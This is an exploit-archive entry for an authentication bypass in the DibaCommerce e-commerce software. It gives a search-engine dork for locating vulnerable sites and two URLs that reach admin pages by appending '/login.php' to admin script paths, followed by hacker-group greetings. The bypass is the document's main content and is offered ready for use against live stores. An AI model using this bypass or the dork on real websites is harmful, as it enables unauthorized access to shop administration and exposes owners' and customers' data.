id: 15018
date: 12/02/2010
title: DibaCommerce Authentication Bypass
author: Shichemt Alen
cves: 

==================================
DibaCommerce Authentication Bypass
==================================

# Exploit Title: DibaCommerce Authentication Bypass
# Date: 12-1-2010
# Author: Shichemt Alen
# Software Link: http://www.dibacommerce.com/
# Version: 2007 - 2010
# Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10
# category: webapps/0day
# Dork : allintext:"Anti-Script Kiddies"
# Contact : shichemt@hotmail.com - http://www.shichemt-alen.com/


#Exploit : http://localhost/Diba/admin/index.php/login.php

--------- http://localhost/Diba/admin/categories.php/login.php





############ Made in Tunisia +216 ############

Greets to :  Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}

-----------------------

xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...

& All Tunisian and Muslim Hackers...


############ Made in Tunisia +216 ############



#  0day.today [2023-03-26]  #